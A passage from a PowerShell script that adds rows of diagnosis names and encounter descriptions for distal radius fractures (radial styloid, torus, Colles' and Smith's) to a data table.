subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of unspecified radius","Unspecified fracture of the lower end of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right radial styloid process","Displaced fracture of right radial styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left radial styloid process","Displaced fracture of left radial styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified radial styloid process","Displaced fracture of unspecified radial styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right radial styloid process","Nondisplaced fracture of right radial styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left radial styloid process","Nondisplaced fracture of left radial styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified radial styloid process","Nondisplaced fracture of unspecified radial styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right radius","Torus fracture of lower end of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right radius","Torus fracture of lower end of right radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right radius","Torus fracture of lower end of right radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right radius","Torus fracture of lower end of right radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right radius","Torus fracture of lower end of right radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right radius","Torus fracture of lower end of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left radius","Torus fracture of lower end of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left radius","Torus fracture of lower end of left radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left radius","Torus fracture of lower end of left radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left radius","Torus fracture of lower end of left radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left radius","Torus fracture of lower end of left radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left radius","Torus fracture of lower end of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified radius","Torus fracture of lower end of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified radius","Torus fracture of lower end of unspecified radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified radius","Torus fracture of lower end of unspecified radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified radius","Torus fracture of lower end of unspecified radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified radius","Torus fracture of lower end of unspecified radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified radius","Torus fracture of lower end of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of right radius","Colles' fracture of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of left radius","Colles' fracture of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Colles' fracture of unspecified radius","Colles' fracture of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Smith's fracture of right radius","Smith's fracture of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Smith's fracture of left radius","Smith's fracture of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = 